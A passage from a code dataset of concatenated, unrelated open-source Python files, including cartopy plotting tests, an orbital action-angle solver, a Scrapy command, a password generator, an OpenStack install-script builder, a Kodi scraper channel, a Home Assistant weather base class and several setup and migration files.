for pth in cpatch.geos_to_path(geos):
patches.append(mpatches.PathPatch(pth))
# buffer by 10 degrees (leaves a small hole in the middle)
geos_buffered = geos.buffer(10)
for pth in cpatch.geos_to_path(geos_buffered):
patches_native.append(mpatches.PathPatch(pth))
collection = PatchCollection(patches_native, facecolor='red', alpha=0.4,
transform=ax.projection
)
ax.add_collection(collection)
collection = PatchCollection(patches, facecolor='yellow', alpha=0.4,
transform=ccrs.Geodetic()
)
ax.add_collection(collection)
# test multiple interior polygons
ax = plt.subplot(212, projection=ccrs.PlateCarree(), xlim=[-5, 15], ylim=[-5, 15])
ax.coastlines()
exterior = np.array(shapely.geometry.box(0, 0, 12, 12).exterior.coords)
interiors = [
np.array(shapely.geometry.box(1, 1, 2, 2, ccw=False).exterior.coords),
np.array(shapely.geometry.box(1, 8, 2, 9, ccw=False).exterior.coords),
]
poly = shapely.geometry.Polygon(exterior, interiors)
patches = []
for pth in cpatch.geos_to_path(poly):
patches.append(mpatches.PathPatch(pth))
collection = PatchCollection(patches, facecolor='yellow', alpha=0.4,
transform=ccrs.Geodetic()
)
ax.add_collection(collection)
@image_comparison(baseline_images=['contour_with_interiors'])
def test_contour_interiors():
# ############## produces a polygon with multiple holes:
nx, ny = 10, 10
numlev = 2
lons, lats = np.meshgrid(np.linspace(-50, 50, nx), np.linspace(-45, 45, ny))
data = np.sin(np.sqrt(lons**2 + lats**2))
ax = plt.subplot(221, projection=ccrs.PlateCarree())
ax.set_global()
plt.title("Native projection")
plt.contourf(lons, lats, data, numlev, transform=ccrs.PlateCarree())
ax.coastlines()
plt.subplot(222, projection=ccrs.PlateCarree())
plt.title("Non-native projection")
ax = plt.gca()
ax.set_global()
plt.contourf(lons, lats, data, numlev, transform=ccrs.Geodetic())
ax.coastlines()
############## produces singular polygons (zero area polygons)
numlev = 2
x, y = np.meshgrid(np.arange(-5.5, 5.5, 0.25), np.arange(-5.5, 5.5, 0.25))
dim = x.shape[0]
data = Z = np.sin(np.sqrt(x**2 + y**2))
lats = np.arange(dim) + 30
lons = np.arange(dim) - 20
ax = plt.subplot(223, projection=ccrs.PlateCarree())
ax.set_global()
plt.title("Native projection")
plt.contourf(lons, lats, data, numlev, transform=ccrs.PlateCarree())
ax.coastlines()
plt.subplot(224, projection=ccrs.PlateCarree())
plt.title("Non-native projection")
ax = plt.gca()
ax.set_global()
cs = plt.contourf(lons, lats, data, numlev, transform=ccrs.Geodetic())
ax.coastlines()
if __name__ == '__main__':
import nose
nose.runmodule(argv=['-s','--with-doctest'], exit=False) | marqh/cartopy | lib/cartopy/tests/mpl/test_shapely_to_mpl.py | Python | gpl-3.0 | 4,821 |
#################
# AA Solvers #
#################
import numpy as np
from itertools import product
from scipy.linalg import solve
from scipy.sparse.linalg import spsolve
def check_each_direction(n,angs,ifprint=True):
""" returns a list of the index of elements of n which do not have adequate
toy angle coverage. The criterion is that we must have at least one sample
in each Nyquist box when we project the toy angles along the vector n """
checks = np.array([])
P = np.array([])
if(ifprint):
print("\nChecking modes:\n====")
for k,i in enumerate(n):
N_matrix = np.linalg.norm(i)
X = np.dot(angs,i)
if(np.abs(np.max(X)-np.min(X))<2.*np.pi):
if(ifprint):
print("Need a longer integration window for mode ", i)
            checks=np.append(checks,k)
P = np.append(P,(2.*np.pi-np.abs(np.max(X)-np.min(X))))
elif(np.abs(np.max(X)-np.min(X))/len(X)>np.pi):
if(ifprint):
print("Need a finer sampling for mode ", i)
checks=np.append(checks,i)
P = np.append(P,(2.*np.pi-np.abs(np.max(X)-np.min(X))))
if(ifprint):
print("====\n")
return checks,P
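# Worked example of the first criterion: for the mode n = (1, 0, 0),
# np.dot(angs, n) is just the first toy-angle component; if those samples
# span only, say, 4 radians (< 2*pi), the mode is flagged as needing a
# longer integration window.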
def solver(AA, N_max, symNx = 2, throw_out_modes=False):
""" Constructs the matrix A and the vector b from a timeseries of toy
action-angles AA to solve for the vector x = (J_0,J_1,J_2,S...) where
x contains all Fourier components of the generating function with |n|<N_max """
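    # Note on dimensions: the linear system built below has one unknown per
    # retained n-vector plus the three mean toy actions, so `a` is a square
    # matrix of size len(n_vectors)+3 (the `n` computed below).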
# Find all integer component n_vectors which lie within sphere of radius N_max
# Here we have assumed that the potential is symmetric x->-x, y->-y, z->-z
# This can be relaxed by changing symN to 1
# Additionally due to time reversal symmetry S_n = -S_-n so we only consider
# "half" of the n-vector-space
angs = unroll_angles(AA.T[3:].T,np.ones(3))
symNz = 2
NNx = range(-N_max, N_max+1, symNx)
NNy = range(-N_max, N_max+1, symNz)
NNz = range(-N_max, N_max+1, symNz)
n_vectors = np.array([[i,j,k] for (i,j,k) in product(NNx,NNy,NNz)
if(not(i==0 and j==0 and k==0) # exclude zero vector
and (k>0 # northern hemisphere
or (k==0 and j>0) # half of x-y plane
or (k==0 and j==0 and i>0)) # half of x axis
and np.sqrt(i*i+j*j+k*k)<=N_max)]) # inside sphere
    # run the coverage check once: `checks` holds the indices of the modes
    # with inadequate angle coverage (a warning is printed for each)
    checks, _ = check_each_direction(n_vectors,angs)
    if(throw_out_modes):
        n_vectors = np.delete(n_vectors, checks.astype(int), axis=0)
n = len(n_vectors)+3
b = np.zeros(shape=(n, ))
a = np.zeros(shape=(n,n))
a[:3,:3]=len(AA)*np.identity(3)
for i in AA:
a[:3,3:]+=2.*n_vectors.T[:3]*np.cos(np.dot(n_vectors,i[3:]))
a[3:,3:]+=4.*np.dot(n_vectors,n_vectors.T)*np.outer(np.cos(np.dot(n_vectors,i[3:])),np.cos(np.dot(n_vectors,i[3:])))
b[:3]+=i[:3]
b[3:]+=2.*np.dot(n_vectors,i[:3])*np.cos(np.dot(n_vectors,i[3:]))
a[3:,:3]=a[:3,3:].T
return np.array(solve(a,b)), n_vectors
def unroll_angles(A,sign):
""" Unrolls the angles, A, so they increase continuously """
n = np.array([0,0,0])
P = np.zeros(np.shape(A))
P[0]=A[0]
for i in range(1,len(A)):
n = n+((A[i]-A[i-1]+0.5*sign*np.pi)*sign<0)*np.ones(3)*2.*np.pi
P[i] = A[i]+sign*n
return P
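# Example: unroll_angles(np.array([[6.2, 0., 0.], [0.1, 0., 0.]]), np.ones(3))
# gives [[6.2, 0., 0.], [0.1 + 2*pi, 0., 0.]] -- the apparent backwards jump
# across the 2*pi boundary is removed so each angle increases continuously.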
import matplotlib.pyplot as plt
from scipy.stats import linregress as lr
def angle_solver(AA, timeseries, N_max, sign, symNx = 2, throw_out_modes=False):
""" Constructs the matrix A and the vector b from a timeseries of toy
action-angles AA to solve for the vector x = (theta_0,theta_1,theta_2,omega_1,
omega_2,omega_3, dSdx..., dSdy..., dSdz...) where x contains all derivatives
of the Fourier components of the generating function with |n| < N_max """
# First unroll angles
angs = unroll_angles(AA.T[3:].T,sign)
# Same considerations as above
symNz = 2
NNx = range(-N_max, N_max+1, symNx)
NNy = range(-N_max, N_max+1, symNz)
NNz = range(-N_max, N_max+1, symNz)
n_vectors = np.array([[i,j,k] for (i,j,k) in product(NNx,NNy,NNz)
if(not(i==0 and j==0 and k==0) # exclude zero vector
and (k>0 # northern hemisphere
or (k==0 and j>0) # half of x-y plane
or (k==0 and j==0 and i>0)) # half of x axis
and np.sqrt(i*i+j*j+k*k)<=N_max # inside sphere
)])
    if(throw_out_modes):
        n_vectors = np.delete(n_vectors, check_each_direction(n_vectors,angs)[0].astype(int), axis=0)
nv = len(n_vectors)
n = 3*nv+6
b = np.zeros(shape=(n, ))
a = np.zeros(shape=(n,n))
a[:3,:3]=len(AA)*np.identity(3)
a[:3,3:6]=np.sum(timeseries)*np.identity(3)
a[3:6,:3]=a[:3,3:6]
a[3:6,3:6]=np.sum(timeseries*timeseries)*np.identity(3)
for i,j in zip(angs,timeseries):
a[6:6+nv,0]+=-2.*np.sin(np.dot(n_vectors,i))
a[6:6+nv,3]+=-2.*j*np.sin(np.dot(n_vectors,i))
a[6:6+nv,6:6+nv]+=4.*np.outer(np.sin(np.dot(n_vectors,i)),np.sin(np.dot(n_vectors,i)))
b[:3]+=i
b[3:6]+=j*i
b[6:6+nv]+=-2.*i[0]*np.sin(np.dot(n_vectors,i))
b[6+nv:6+2*nv]+=-2.*i[1]*np.sin(np.dot(n_vectors,i))
b[6+2*nv:6+3*nv]+=-2.*i[2]*np.sin(np.dot(n_vectors,i))
a[6+nv:6+2*nv,1]=a[6:6+nv,0]
a[6+2*nv:6+3*nv,2]=a[6:6+nv,0]
a[6+nv:6+2*nv,4]=a[6:6+nv,3]
a[6+2*nv:6+3*nv,5]=a[6:6+nv,3]
a[6+nv:6+2*nv,6+nv:6+2*nv]=a[6:6+nv,6:6+nv]
a[6+2*nv:6+3*nv,6+2*nv:6+3*nv]=a[6:6+nv,6:6+nv]
a[:6,:]=a[:,:6].T
return np.array(solve(a,b))
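# Minimal usage sketch (illustrative; input shapes assumed from the code
# above): given an (N, 6) array AA of toy actions and angles sampled along
# an orbit and the matching times t,
#   acts, n_vecs = solver(AA, N_max=6)
#   sol = angle_solver(AA, t, N_max=6, sign=np.ones(3))
# acts[:3] are the estimated true actions; sol starts with theta_0 (3
# values) followed by the three frequencies (see the docstrings above).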
| adrn/gary | gala/dynamics/_genfunc/solver.py | Python | mit | 5,861 |
import sys
import platform
import twisted
import scrapy
from scrapy.command import ScrapyCommand
class Command(ScrapyCommand):
def syntax(self):
return "[-v]"
def short_desc(self):
return "Print Scrapy version"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("--verbose", "-v", dest="verbose", action="store_true",
help="also display twisted/python/platform info (useful for bug reports)")
def run(self, args, opts):
if opts.verbose:
try:
import lxml.etree
except ImportError:
lxml_version = libxml2_version = "(lxml not available)"
else:
lxml_version = ".".join(map(str, lxml.etree.LXML_VERSION))
libxml2_version = ".".join(map(str, lxml.etree.LIBXML_VERSION))
print "Scrapy : %s" % scrapy.__version__
print "lxml : %s" % lxml_version
print "libxml2 : %s" % libxml2_version
print "Twisted : %s" % twisted.version.short()
print "Python : %s" % sys.version.replace("\n", "- ")
print "Platform: %s" % platform.platform()
else:
print "Scrapy %s" % scrapy.__version__
| pablohoffman/scrapy | scrapy/commands/version.py | Python | bsd-3-clause | 1,277 |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2015 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2015-07-27
#
"""
Generate password from (mostly) gibberish words.
http://stackoverflow.com/a/5502875/356942
"""
from __future__ import print_function, unicode_literals, absolute_import
import itertools
import string
from generators import WordGenBase
initial_consonants = (
set(string.ascii_lowercase) - set('aeiou')
# remove those easily confused with others
- set('qxc')
# add some crunchy clusters
| set(['bl', 'br', 'cl', 'cr', 'dr', 'fl',
'fr', 'gl', 'gr', 'pl', 'pr', 'sk',
'sl', 'sm', 'sn', 'sp', 'st', 'str',
'sw', 'tr'])
)
final_consonants = (
set(string.ascii_lowercase) - set('aeiou')
# confusable
- set('qxcsj')
# crunchy clusters
| set(['ct', 'ft', 'mp', 'nd', 'ng', 'nk', 'nt',
'pt', 'sk', 'sp', 'ss', 'st'])
)
vowels = 'aeiou'
class PronounceableGenerator(WordGenBase):
"""Generate passwords based on (mostly) gibberish words.
Better entropy (so stronger passwords for the same bits) than
the dictionary-based generator (``WordlistGenerator``), but
a bit harder to remember.
The words in the passwords are joined with hyphens, but these are
not included in the calculation of password strength.
"""
def __init__(self):
self._syllables = None
@property
def data(self):
if not self._syllables:
# each syllable is consonant-vowel-consonant "pronounceable"
self._syllables = map(''.join,
itertools.product(initial_consonants,
vowels,
final_consonants))
return self._syllables
@property
def id(self):
return 'pronounceable'
@property
def name(self):
return 'Pronounceable Nonsense'
@property
def description(self):
return 'Pronounceable, (mostly) nonsense words'
if __name__ == '__main__':
gen = PronounceableGenerator()
print(gen.password(length=30))
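    # Rough strength estimate: each syllable is one draw out of
    # len(initial_consonants) * len(vowels) * len(final_consonants)
    # combinations -- a few thousand, i.e. roughly 12 bits per syllable.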
| deanishe/alfred-pwgen | src/generators/gen_pronounceable.py | Python | mit | 2,220 |
#!/usr/bin/env python
from distutils.core import setup
setup(
name='graphitesend',
version='0.7.0',
description='A simple interface for sending metrics to Graphite',
author='Danny Lawrence',
author_email='dannyla@linux.com',
url='https://github.com/daniellawrence/graphitesend',
packages=['graphitesend'],
long_description="https://github.com/daniellawrence/graphitesend",
entry_points={
'console_scripts': [
'graphitesend = graphitesend.graphitesend:cli',
],
},
extras_require={
'asynchronous': ['gevent>=1.0.0'],
}
)
| PabloLefort/graphitesend | setup.py | Python | apache-2.0 | 604 |
#----------------------------------------------------------------------
# Copyright (c) 2013 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
# Class to generate command files to install OpenStack Folsom
# Per OpenStack Folsum Guide (revised for Ubuntu Precise)
import os, errno
from gram.am.gram import config
import Glance, Keystone, Nova, OpenVSwitch, RabbitMQ, MySQL
import OperatingSystem, Quantum, Hypervisor
class OpenStack:
def __init__(self):
pass
_CONTROL_INSTALLERS = [
{
"name": "operating_system_control",
"installer" : OperatingSystem.OperatingSystem(control_node=True)
},
{
"name": "mysql",
"installer": MySQL.MySQL()
},
{
"name": "rabbitmq",
"installer": RabbitMQ.RabbitMQ()
},
{
"name": "keystone",
"installer": Keystone.Keystone()
},
{
"name": "glance",
"installer": Glance.Glance()
},
{
"name": "nova_control",
"installer": Nova.Nova(control_node=True)
},
{
"name": "openvswitch_control",
"installer": OpenVSwitch.OpenVSwitch(control_node=True)
},
{
"name": "quantum",
"installer": Quantum.Quantum()
}
]
_COMPUTE_INSTALLERS = [
{
"name": "operating_system_compute",
"installer" : OperatingSystem.OperatingSystem(control_node=False)
},
{
"name": "hypervisor",
"installer": Hypervisor.Hypervisor()
},
{
"name": "nova_compute",
"installer": Nova.Nova(control_node=False)
},
{
"name": "openvswitch_compute",
"installer": OpenVSwitch.OpenVSwitch(control_node=False)
}
]
def createCommands(self, \
installers,
directory,
install_filename,
uninstall_filename):
try:
os.makedirs(directory)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(directory):
pass
else: raise
install_file = open(directory + "/" + install_filename, 'w')
uninstall_file = open(directory + "/" + uninstall_filename, 'w')
for module in installers:
module_name = module["name"]
module_installer = module["installer"]
if module_name != "operating_system_control" and module_name != "operating_system_compute":
install_file.write("%s/install_%s.sh\n" % \
(directory, module_name))
uninstall_file.write("%s/uninstall_%s.sh\n" % \
(directory, module_name))
self.installerCommands(directory, module_name, \
module_installer, True)
self.installerCommands(directory, module_name, \
module_installer, False)
install_file.close()
uninstall_file.close()
def installerCommands(self, dir, module_name, module_installer, install):
prefix = "install"
if not install:
prefix = "uninstall"
module_install_file = open("%s/%s_%s.sh" % (dir, prefix, module_name), "w")
module_installer.clear()
if install:
module_installer.installCommands()
else:
module_installer.uninstallCommands()
module_install_commands = module_installer.getCommands()
for ic in module_install_commands:
module_install_file.write(ic)
module_install_file.write("\n")
module_install_file.close()
if __name__ == "__main__":
config.initialize("/etc/gram/config.json")
openstack = OpenStack()
openstack.createCommands(OpenStack._CONTROL_INSTALLERS, \
"/tmp/install",
"install_control.sh", \
"uninstall_control.sh")
openstack.createCommands(OpenStack._COMPUTE_INSTALLERS, \
"/tmp/install",
"install_compute.sh", \
"uninstall_compute.sh")
| GENI-NSF/gram | grizzly/install/OpenStack.py | Python | mit | 5,584 |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
# ------------------------------------------------------------
import re
from core import httptools
from core import logger
from core import scrapertools
from core.item import Item
HOST = "http://documentales-online.com/"
def mainlist(item):
logger.info()
itemlist = list()
itemlist.append(Item(channel=item.channel, title="Novedades", action="listado", url=HOST))
itemlist.append(Item(channel=item.channel, title="Destacados", action="seccion", url=HOST, extra="destacados"))
itemlist.append(Item(channel=item.channel, title="Series Destacadas", action="seccion", url=HOST, extra="series"))
# itemlist.append(Item(channel=item.channel, title="Top 100", action="categorias", url=HOST))
# itemlist.append(Item(channel=item.channel, title="Populares", action="categorias", url=HOST))
itemlist.append(Item(channel=item.channel, title="Buscar por:"))
itemlist.append(Item(channel=item.channel, title=" Título", action="search"))
itemlist.append(Item(channel=item.channel, title=" Categorías", action="categorias", url=HOST))
# itemlist.append(Item(channel=item.channel, title=" Series y Temas", action="categorias", url=HOST))
return itemlist
def seccion(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}|-\s", "", data)
if item.extra == "destacados":
patron_seccion = '<h4 class="widget-title">Destacados</h4><div class="textwidget"><ul>(.*?)</ul>'
action = "findvideos"
else:
patron_seccion = '<h4 class="widget-title">Series destacadas</h4><div class="textwidget"><ul>(.*?)</ul>'
action = "listado"
data = scrapertools.find_single_match(data, patron_seccion)
matches = re.compile('<a href="([^"]+)">(.*?)</a>', re.DOTALL).findall(data)
aux_action = action
for url, title in matches:
if item.extra != "destacados" and "Cosmos (Carl Sagan)" in title:
action = "findvideos"
else:
action = aux_action
itemlist.append(item.clone(title=title, url=url, action=action, fulltitle=title))
return itemlist
def listado(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}|-\s", "", data)
pagination = scrapertools.find_single_match(data, '<div class="older"><a href="([^"]+)"')
if not pagination:
pagination = scrapertools.find_single_match(data, '<span class=\'current\'>\d</span>'
'<a class="page larger" href="([^"]+)">')
patron = '<ul class="sp-grid">(.*?)</ul>'
data = scrapertools.find_single_match(data, patron)
matches = re.compile('<a href="([^"]+)">(.*?)</a>', re.DOTALL).findall(data)
for url, title in matches:
itemlist.append(item.clone(title=title, url=url, action="findvideos", fulltitle=title))
if pagination:
itemlist.append(item.clone(title=">> Página siguiente", url=pagination))
return itemlist
def categorias(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}|-\s", "", data)
data = scrapertools.find_single_match(data, 'a href="#">Categorías</a><ul class="sub-menu">(.*?)</ul>')
matches = re.compile('<a href="([^"]+)">(.*?)</a>', re.DOTALL).findall(data)
for url, title in matches:
itemlist.append(item.clone(title=title, url=url, action="listado", fulltitle=title))
return itemlist
def search(item, texto):
logger.info()
texto = texto.replace(" ", "+")
try:
item.url = HOST + "?s=%s" % texto
return listado(item)
    # Catch the exception so one failing channel doesn't break the global search
except:
import sys
for line in sys.exc_info():
logger.error("%s" % line)
return []
def findvideos(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}|-\s", "", data)
if item.fulltitle == "Cosmos (Carl Sagan)":
matches = scrapertools.find_multiple_matches(data, '<p><strong>(.*?)</strong><br /><iframe.+?src="(https://www\.youtube\.com/[^?]+)')
for title, url in matches:
new_item = item.clone(title=title, url=url)
from core import servertools
aux_itemlist = servertools.find_video_items(new_item)
for videoitem in aux_itemlist:
videoitem.title = new_item.title
videoitem.fulltitle = new_item.title
videoitem.channel = item.channel
# videoitem.thumbnail = item.thumbnail
itemlist.extend(aux_itemlist)
else:
data = scrapertools.find_multiple_matches(data, '<iframe.+?src="(https://www\.youtube\.com/[^?]+)')
from core import servertools
itemlist.extend(servertools.find_video_items(data=",".join(data)))
for videoitem in itemlist:
videoitem.fulltitle = item.fulltitle
videoitem.channel = item.channel
# videoitem.thumbnail = item.thumbnail
return itemlist
| r0balo/pelisalacarta | python/main-classic/channels/documentalesonline.py | Python | gpl-3.0 | 5,391 |
# copyright 2003-2010 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
# copyright 2003-2010 Sylvain Thenault, all rights reserved.
# contact mailto:thenault@gmail.com
#
# This file is part of logilab-astng.
#
# logilab-astng is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# logilab-astng is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-astng. If not, see <http://www.gnu.org/licenses/>.
__revision__="$Id: __init__.py,v 1.1 2005-06-13 20:55:20 syt Exp $"
| dbbhattacharya/kitsune | vendor/packages/logilab-astng/test/data/__init__.py | Python | bsd-3-clause | 1,001 |
"""
Weather component that handles meteorological data for your location.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/weather/
"""
import asyncio
import logging
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.temperature import display_temp as show_temp
from homeassistant.const import PRECISION_WHOLE, PRECISION_TENTHS, TEMP_CELSIUS
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA # noqa
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = []
DOMAIN = 'weather'
ENTITY_ID_FORMAT = DOMAIN + '.{}'
ATTR_CONDITION_CLASS = 'condition_class'
ATTR_FORECAST = 'forecast'
ATTR_FORECAST_TEMP = 'temperature'
ATTR_FORECAST_TIME = 'datetime'
ATTR_WEATHER_ATTRIBUTION = 'attribution'
ATTR_WEATHER_HUMIDITY = 'humidity'
ATTR_WEATHER_OZONE = 'ozone'
ATTR_WEATHER_PRESSURE = 'pressure'
ATTR_WEATHER_TEMPERATURE = 'temperature'
ATTR_WEATHER_VISIBILITY = 'visibility'
ATTR_WEATHER_WIND_BEARING = 'wind_bearing'
ATTR_WEATHER_WIND_SPEED = 'wind_speed'
@asyncio.coroutine
def async_setup(hass, config):
"""Set up the weather component."""
component = EntityComponent(_LOGGER, DOMAIN, hass)
yield from component.async_setup(config)
return True
# pylint: disable=no-member, no-self-use
class WeatherEntity(Entity):
"""ABC for weather data."""
@property
def temperature(self):
"""Return the platform temperature."""
raise NotImplementedError()
@property
def temperature_unit(self):
"""Return the unit of measurement."""
raise NotImplementedError()
@property
def pressure(self):
"""Return the pressure."""
return None
@property
def humidity(self):
"""Return the humidity."""
raise NotImplementedError()
@property
def wind_speed(self):
"""Return the wind speed."""
return None
@property
def wind_bearing(self):
"""Return the wind bearing."""
return None
@property
def ozone(self):
"""Return the ozone level."""
return None
@property
def attribution(self):
"""Return the attribution."""
return None
@property
def visibility(self):
"""Return the visibility."""
return None
@property
def forecast(self):
"""Return the forecast."""
return None
@property
def precision(self):
"""Return the forecast."""
return PRECISION_TENTHS if self.temperature_unit == TEMP_CELSIUS \
else PRECISION_WHOLE
@property
def state_attributes(self):
"""Return the state attributes."""
data = {
ATTR_WEATHER_TEMPERATURE: show_temp(
self.hass, self.temperature, self.temperature_unit,
self.precision),
ATTR_WEATHER_HUMIDITY: self.humidity,
}
ozone = self.ozone
if ozone is not None:
data[ATTR_WEATHER_OZONE] = ozone
pressure = self.pressure
if pressure is not None:
data[ATTR_WEATHER_PRESSURE] = pressure
wind_bearing = self.wind_bearing
if wind_bearing is not None:
data[ATTR_WEATHER_WIND_BEARING] = wind_bearing
wind_speed = self.wind_speed
if wind_speed is not None:
data[ATTR_WEATHER_WIND_SPEED] = wind_speed
visibility = self.visibility
if visibility is not None:
data[ATTR_WEATHER_VISIBILITY] = visibility
attribution = self.attribution
if attribution is not None:
data[ATTR_WEATHER_ATTRIBUTION] = attribution
if self.forecast is not None:
forecast = []
for forecast_entry in self.forecast:
forecast_entry = dict(forecast_entry)
forecast_entry[ATTR_FORECAST_TEMP] = show_temp(
self.hass, forecast_entry[ATTR_FORECAST_TEMP],
self.temperature_unit, self.precision)
forecast.append(forecast_entry)
data[ATTR_FORECAST] = forecast
return data
@property
def state(self):
"""Return the current state."""
return self.condition
@property
def condition(self):
"""Return the current condition."""
raise NotImplementedError()
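# A minimal platform sketch (illustrative only, not part of this component):
# a concrete weather entity just overrides the abstract properties, e.g.
#
#     class DemoWeather(WeatherEntity):
#         @property
#         def temperature(self):
#             return 21.5
#
#         @property
#         def temperature_unit(self):
#             return TEMP_CELSIUS
#
#         @property
#         def humidity(self):
#             return 60
#
#         @property
#         def condition(self):
#             return 'sunny'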
| ewandor/home-assistant | homeassistant/components/weather/__init__.py | Python | apache-2.0 | 4,427 |
#!/usr/bin/env python
#
# Copyright (C) 2005 Christopher J. Stawarz <chris@pseudogreen.org>
#
# This file is part of i2py.
#
# i2py is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# i2py is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with i2py; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import sys
from distutils.core import setup
# Need to do this to ensure that ytab.py exists and is up to date
import i2py
################################################################################
#
# Generate documentation with pydoc
#
################################################################################
if len(sys.argv) > 1 and sys.argv[1] == 'sdist':
import os, os.path
import pydoc
os.chdir('doc')
moddir = os.path.join(os.pardir, 'i2py')
sys.path.insert(0, moddir)
pydoc.writedocs(moddir, 'i2py.')
sys.path.pop(0)
os.chdir(os.pardir)
################################################################################
#
# Run setup()
#
################################################################################
# Grab the description from the package's doc string
desc = i2py.__doc__.split('\n\n')
setup(name='i2py',
version=i2py.__version__,
author='Christopher J. Stawarz',
author_email='chris@pseudogreen.org',
url='http://software.pseudogreen.org/i2py/',
license='http://www.fsf.org/licensing/licenses/gpl.html',
platforms=['any'],
description=desc[0].strip(),
long_description=('\n' + '\n\n'.join(desc[1:]).strip() + '\n'),
packages=['i2py'],
scripts=['idl2python'],
)
| zimmerst/i2py | setup.py | Python | gpl-2.0 | 2,104 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.23 on 2020-06-01 21:22
from __future__ import unicode_literals
from django.db import migrations, models
from django.utils.text import slugify
def migrate_data_forward(apps, schema_editor):
Impresso = apps.get_model('lotes', 'Impresso')
for instance in Impresso.objects.all():
instance.slug = slugify(instance.nome)
instance.save()
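    # Note: this issues one UPDATE per row, which is fine for small tables;
    # historical models from apps.get_model() carry no custom save() logic,
    # so per-row save() is safe here.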
def migrate_data_backward(apps, schema_editor):
pass
class Migration(migrations.Migration):
dependencies = [
('lotes', '0049_impresso_slug'),
]
operations = [
migrations.RunPython(
migrate_data_forward,
migrate_data_backward,
),
]
| anselmobd/fo2 | src/lotes/migrations/0050_impresso_slug_init.py | Python | mit | 714 |
print("This is simple2.py")
| sprescott3/cs3240-labdemo | simple2.py | Python | mit | 28 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.mgmt.core import ARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Optional
from azure.core.credentials import TokenCredential
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from ._configuration import NetworkManagementClientConfiguration
from .operations import ApplicationGatewaysOperations
from .operations import ApplicationSecurityGroupsOperations
from .operations import AvailableDelegationsOperations
from .operations import AvailableResourceGroupDelegationsOperations
from .operations import AzureFirewallsOperations
from .operations import AzureFirewallFqdnTagsOperations
from .operations import NetworkManagementClientOperationsMixin
from .operations import DdosCustomPoliciesOperations
from .operations import DdosProtectionPlansOperations
from .operations import AvailableEndpointServicesOperations
from .operations import ExpressRouteCircuitAuthorizationsOperations
from .operations import ExpressRouteCircuitPeeringsOperations
from .operations import ExpressRouteCircuitConnectionsOperations
from .operations import PeerExpressRouteCircuitConnectionsOperations
from .operations import ExpressRouteCircuitsOperations
from .operations import ExpressRouteServiceProvidersOperations
from .operations import ExpressRouteCrossConnectionsOperations
from .operations import ExpressRouteCrossConnectionPeeringsOperations
from .operations import ExpressRouteGatewaysOperations
from .operations import ExpressRouteConnectionsOperations
from .operations import ExpressRoutePortsLocationsOperations
from .operations import ExpressRoutePortsOperations
from .operations import ExpressRouteLinksOperations
from .operations import InterfaceEndpointsOperations
from .operations import LoadBalancersOperations
from .operations import LoadBalancerBackendAddressPoolsOperations
from .operations import LoadBalancerFrontendIPConfigurationsOperations
from .operations import InboundNatRulesOperations
from .operations import LoadBalancerLoadBalancingRulesOperations
from .operations import LoadBalancerOutboundRulesOperations
from .operations import LoadBalancerNetworkInterfacesOperations
from .operations import LoadBalancerProbesOperations
from .operations import NatGatewaysOperations
from .operations import NetworkInterfacesOperations
